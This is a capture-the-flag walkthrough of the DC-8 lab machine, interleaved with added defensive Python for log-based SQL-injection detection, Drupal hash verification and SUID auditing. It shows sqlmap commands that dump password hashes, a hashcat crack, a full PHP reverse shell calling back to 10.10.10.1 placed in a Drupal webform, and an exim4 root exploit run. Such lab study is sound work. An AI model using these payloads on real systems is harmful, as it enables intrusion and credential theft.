DC-8 penetration testing walkthrough

DC-8


author: leadlife

date: 2023/5/18

blog: https://tripse.github.io/

Tools used in this test:

  • Information gathering: nmap, fscan, cmseek, searchsploit
  • Getting a shell: none
  • Vulnerability exploitation: sqlmap
  • Brute force: hashid, hashcat
  • Fuzzing: none
  • Auxiliary tools: none
  • Privilege escalation: none

External information gathering

Host discovery with an Nmap ICMP (ping) sweep

Target IP for this box: 10.10.10.138

sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:09 CST
Nmap scan report for 10.10.10.138
Host is up (0.00020s latency).
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:EF:7D:81 (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds

Port discovery with fscan

sudo fscan -h 10.10.10.138 -p 0-65535 -t 30
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.138    is alive
[*] Icmp alive hosts len is: 1
10.10.10.138:22 open
10.10.10.138:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://10.10.10.138       code:200 len:7924   title:Welcome to DC-8 | DC-8
已完成 2/2
[*] 扫描结束,耗时: 5.851445651s

Detailed port scan with Nmap

sudo nmap -sS -sV -sC -O -T4 --min-rate 10000 -oN nmap.all 10.10.10.138 -p22,80

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:10 CST
Nmap scan report for 10.10.10.138
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
|   256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_  256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
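The normal (-oN) output above is easy to read but awkward to track over time. The parser below, an added example written for this article and not part of the original post or of nmap itself, turns that text into a structured inventory (host, MAC, per-port service and version, NSE script results such as http-generator and robots.txt entries) so later scans of the same host can be diffed. The embedded input is an excerpt of the scan output above; the function and field names are my own.

```python
import json
import re

# Excerpt of the nmap -oN output from the scan above (the -sV/-sC section).
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.138
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
|_  256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| name: value" or "|_name: value"; lines without a "name:" head are continuations
SCRIPT_RE = re.compile(r"^\|_?\s*([\w.-]+):\s*(.*)$")


def parse_nmap_normal(text):
    """Return [{address, mac, ports: [{port, proto, state, service, version, scripts}]}]."""
    hosts, host, port, last_script = [], None, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = {"address": m.group(1), "mac": None, "ports": []}
            hosts.append(host)
            port = last_script = None
            continue
        if host is None:
            continue
        if line.startswith("MAC Address:"):
            host["mac"] = line.split()[2]
            continue
        m = PORT_RE.match(line)
        if m:
            port = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                    "service": m.group(4), "version": m.group(5).strip(), "scripts": {}}
            host["ports"].append(port)
            last_script = None
            continue
        if port is not None and line.startswith("|"):
            m = SCRIPT_RE.match(line)
            if m:
                last_script = m.group(1)
                port["scripts"][last_script] = m.group(2).strip()
            elif last_script:
                # continuation line of a multi-line script result (host keys, robots entries)
                extra = line.lstrip("|_ ").strip()
                port["scripts"][last_script] = (port["scripts"][last_script] + " " + extra).strip()
    return hosts


def web_fingerprints(hosts):
    """(address, port, generator) for every HTTP service that exposes an http-generator tag."""
    out = []
    for h in hosts:
        for p in h["ports"]:
            gen = p["scripts"].get("http-generator")
            if gen:
                out.append((h["address"], p["port"], gen))
    return out


if __name__ == "__main__":
    inventory = parse_nmap_normal(NMAP_OUTPUT)
    print(json.dumps(inventory, indent=2))
    print("CMS fingerprints:", web_fingerprints(inventory))
```

From a defender's side the interesting field is the one Nmap pulled from the page itself: the `http-generator` meta tag announces "Drupal 7" to anyone who asks, which is exactly the lead the rest of this walkthrough follows. Removing that tag and the default robots.txt listing does not fix anything, but it stops handing out the version for free.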

Identifying the CMS

Visiting the web page shows that it is Drupal.

CMSeek confirms the CMS version (screenshot in the original).

searchsploit lookup for known vulnerabilities in this CMS version

Drupal 7 has known RCE and SQL injection issues (screenshot in the original).

Getting a SHELL

Trying the public exploits

All of them failed. I suspect the author changed something, or it may be the environment, so I switched to manual testing.

Getting the password hashes via SQL injection

The injection point is the nid parameter:

http://10.10.10.138/?nid=1
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment

Enumerating the databases:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment --dbs

(screenshot in the original)

Enumerating the tables:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db --tables
+-----------------------------+
| block                       |
| cache                       |
| filter                      |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+

Enumerating the columns of the users table:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users --columns

(screenshot in the original)

Dumping the account names and password hashes:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users -C "name,pass" --dump
Database: d7db
Table: users
[2 entries]
+--------+---------------------------------------------------------+
| name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+
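A sqlmap run like the one above is noisy in the web server's access log: the nid parameter, which the application only ever uses as an integer, suddenly carries comments, keywords and boolean tests, and the default User-Agent names the tool. The detector below is an added example written for this article (not code from the original post or from sqlmap); the log lines are constructed to mimic that traffic and are not real DC-8 logs, and the set of numeric parameters (`NUMERIC_PARAMS`) is an assumption a defender would fill in from the application's routes.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format lines modelled on what a sqlmap run with
# --tamper=space2comment against /?nid=1 leaves behind. Not real DC-8 log data.
SAMPLE_LOG = """\
10.10.10.1 - - [18/May/2023:20:30:01 +0800] "GET /?nid=1 HTTP/1.1" 200 7924 "-" "Mozilla/5.0"
10.10.10.1 - - [18/May/2023:20:30:05 +0800] "GET /?nid=1%20AND%201%3D1 HTTP/1.1" 200 7924 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.10.10.1 - - [18/May/2023:20:30:06 +0800] "GET /?nid=1%2F%2A%2A%2FAND%2F%2A%2A%2F1%3D2 HTTP/1.1" 200 7101 "-" "Mozilla/5.0"
10.10.10.1 - - [18/May/2023:20:30:07 +0800] "GET /?nid=1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1%2C2 HTTP/1.1" 500 1120 "-" "Mozilla/5.0"
10.10.10.20 - - [18/May/2023:20:31:00 +0800] "GET /?nid=2 HTTP/1.1" 200 7800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
INLINE_COMMENT = re.compile(r"/\*.*?\*/")
SQL_KEYWORDS = re.compile(r"\b(union|select|sleep|benchmark|information_schema|load_file)\b", re.I)
BOOLEAN_TEST = re.compile(r"\b(and|or)\s+[\w'\"]+\s*=\s*[\w'\"]+", re.I)
NUMERIC_PARAMS = {"nid"}  # assumption: parameters the application only uses as integers


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def score_request(entry):
    """Return a list of human-readable reasons this request looks like SQL injection probing."""
    reasons = []
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap user-agent")
    for name, value in parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True):
        decoded = unquote_plus(value)               # second decode catches double-encoded values
        normalized = INLINE_COMMENT.sub(" ", decoded)  # undo space2comment before keyword matching
        n_comments = len(INLINE_COMMENT.findall(decoded))
        if n_comments:
            reasons.append(f"{name}: {n_comments} inline comments used as whitespace (space2comment)")
        kws = sorted({k.lower() for k in SQL_KEYWORDS.findall(normalized)})
        if kws:
            reasons.append(f"{name}: SQL keywords {kws}")
        if BOOLEAN_TEST.search(normalized):
            reasons.append(f"{name}: boolean test expression")
        if name in NUMERIC_PARAMS and not decoded.strip().isdigit():
            reasons.append(f"{name}: non-numeric value {decoded!r}")
    return reasons


def analyze(lines, threshold=2):
    """Flag individual requests and the source IPs that sent at least `threshold` of them."""
    findings, per_ip = [], Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = score_request(entry)
        if reasons:
            per_ip[entry["ip"]] += 1
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "target": entry["target"], "reasons": reasons})
    suspicious_ips = {ip: n for ip, n in per_ip.items() if n >= threshold}
    return findings, suspicious_ips


if __name__ == "__main__":
    found, ips = analyze(SAMPLE_LOG.splitlines())
    for f in found:
        print(f["ip"], f["ts"], f["target"], "->", "; ".join(f["reasons"]))
    print("sources over threshold:", ips)
```

Run it over a real file with `analyze(open("/var/log/apache2/access.log"))`. The two checks that survive a renamed User-Agent are the structural ones: a parameter that should be an integer carrying anything else, and `/**/` sequences standing in for spaces; those are the same properties a whitelist validator on the server side would reject before the value ever reached a query.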

Identifying the hash

(screenshot in the original)

Cracking the hash offline

Online lookup sites failed, so I cracked it offline. First, hashid gives the hashcat mode number:

leadlife@endeavrouOS /o/s/tamper> hashid -m
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
Analyzing '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
[+] Drupal > v7.x [Hashcat Mode: 7900]
hashcat -a 0 -m 7900 hash.txt /usr/share/seclists/Passwords/probable-v2-top12000.txt

john's password is recovered:

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF:turtle
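What hashid recognised as "Drupal > v7.x" is a phpass-style hash: `$S$`, one character encoding the iteration count as a power of two, an 8-character salt, then a custom base64 of an iterated SHA-512, cut to 55 characters. The code below is an added example, a Python port of that scheme written for this article (it is not Drupal's code and not part of the original post); it parses john's hash from the dump above, shows that `D` means 2^15 = 32768 iterations, and verifies the recovered password against it. The point for a defender is that the cost is configurable and the work factor, not the algorithm, is what made the wordlist attack cheap here.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55                          # stored hashes are truncated to 55 characters
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30    # range Drupal 7 accepts for the cost character

# john's hash exactly as dumped above.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"


def parse_setting(stored):
    """Split the 12-character setting prefix: '$S$' + cost character + 8-character salt."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("not a Drupal 7 phpass-style hash")
    count_log2 = ITOA64.find(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        raise ValueError("iteration count outside the accepted range")
    return {"algo": "sha512" if setting[1] == "S" else "unknown",
            "count_log2": count_log2, "iterations": 1 << count_log2, "salt": setting[4:12]}


def _password_base64(data):
    """phpass-style base64: ITOA64 alphabet, no padding, bytes packed little-endian 3 at a time."""
    count, out, i = len(data), [], 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def drupal7_crypt(password, setting_source):
    """Recompute the stored form of `password` under the setting taken from an existing hash."""
    s = parse_setting(setting_source)
    pw = password.encode("utf-8")
    digest = hashlib.sha512(s["salt"].encode("ascii") + pw).digest()
    for _ in range(s["iterations"]):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting_source[:12] + _password_base64(digest))[:HASH_LENGTH]


def check_password(password, stored):
    """Constant-time comparison of a candidate password against a stored '$S$' hash."""
    if len(password) > 512 or not stored.startswith("$S$"):
        return False
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)


if __name__ == "__main__":
    print(parse_setting(JOHN_HASH))
    print("turtle matches:", check_password("turtle", JOHN_HASH))
```

Two things follow from the format. The salt is per user, so a leaked table cannot be attacked with a single precomputed list, but 2^15 SHA-512 calls per guess is still fast on a GPU, which is why a 12,000-word list finished in seconds; raising the cost character or moving to a memory-hard scheme is the lever. And because only 43 base64 characters of the digest survive the truncation, a verifier must compare the truncated strings, as `check_password` does, not the full 86-character encoding.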

Getting a shell from the admin back end

Log in to the back end at http://10.10.10.138/user/ with the recovered credentials:

(screenshot in the original)

Click Contact Us:

(screenshot in the original)

Then click Webform: PHP code can be added directly here to get a shell.

(screenshot in the original)

Set the content to php-reverse-shell:

<p>Thanks for taking the time to contact us. We shall be in contact soon.</p>
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process's STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        // If we can read from the process's STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?>

Switch the text format to PHP code and save. Listen locally:

nc -lvnp 1234

Submit the form with any content and the reverse shell connects back (screenshots in the original).

Upgrading the shell

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$ export TERM=xterm

Internal information gathering

Kernel and distribution (screenshot in the original)

SUID

exim4 (screenshot in the original)

sudo

No sudo rights (screenshot in the original)
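The SUID listing is the step that decides this box, and it is also the cheapest thing to monitor on the defending side: the set of set-uid/set-gid binaries on a host rarely changes, so a baseline plus a periodic diff catches both a newly dropped SUID file and a legitimate one (exim4 is set-uid root on Debian by design) whose size or ownership changed. The script below is an added example written for this article, not part of the original post; the default root list is an assumption for a typical Debian layout, and `demo_in_tempdir` builds a constructed directory tree so the logic can be exercised without touching the real filesystem.

```python
import json
import os
import stat
import sys
import tempfile

# Assumed roots for a Debian-style host; /proc, /sys and /dev are left out on purpose.
DEFAULT_ROOTS = ["/bin", "/sbin", "/usr", "/opt", "/home", "/tmp", "/var", "/srv", "/etc"]


def find_setid_files(roots):
    """Return {path: {mode, uid, gid, size}} for every regular file with the setuid or setgid bit."""
    found = {}
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)          # lstat: do not follow symlinks
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    found[path] = {"mode": oct(st.st_mode & 0o7777), "uid": st.st_uid,
                                   "gid": st.st_gid, "size": st.st_size}
    return found


def diff_against_baseline(current, baseline):
    """Split the current set-id inventory into entries added, removed and changed versus the baseline."""
    added = {p: v for p, v in current.items() if p not in baseline}
    removed = {p: v for p, v in baseline.items() if p not in current}
    changed = {p: {"before": baseline[p], "after": v}
               for p, v in current.items() if p in baseline and baseline[p] != v}
    return {"added": added, "removed": removed, "changed": changed}


def demo_in_tempdir():
    """Constructed sample tree: one setuid file and one ordinary file, then a first and second audit run."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    setid_path = os.path.join(root, "setuid_tool")
    plain_path = os.path.join(root, "plain_tool")
    for path in (setid_path, plain_path):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(setid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    current = find_setid_files([root])
    return {"root": root, "current": current,
            "first_run": diff_against_baseline(current, {}),      # no baseline yet: everything is "added"
            "second_run": diff_against_baseline(current, current)}  # unchanged host: empty report


if __name__ == "__main__":
    # Usage: python setid_audit.py [baseline.json] [root ...]; the first run writes the baseline.
    baseline_file = sys.argv[1] if len(sys.argv) > 1 else "setid-baseline.json"
    roots = sys.argv[2:] or DEFAULT_ROOTS
    current = find_setid_files(roots)
    if not os.path.exists(baseline_file):
        with open(baseline_file, "w") as fh:
            json.dump(current, fh, indent=2, sort_keys=True)
        print(f"baseline written to {baseline_file}: {len(current)} set-id files")
    else:
        with open(baseline_file) as fh:
            baseline = json.load(fh)
        print(json.dumps(diff_against_baseline(current, baseline), indent=2, sort_keys=True))
```

Store the baseline somewhere the audited host cannot rewrite it; a diff that reports a new entry under /tmp or /var, or a size change on a known binary such as exim4, is the signal to look at before an attacker does.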

Privilege escalation

Privilege escalation through the SUID exim4 binary

Transfer the exploit script to the box with Python, then run it:

www-data@dc-8:/tmp$ bash 46996.sh -m netcat
bash 46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Thu, 18 May 2023 23:22:48 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1pzdai-0004rL-Bo
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# cd /root
root@dc-8:/root# ls
flag.txt
root@dc-8:/root# cat flag.txt


Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.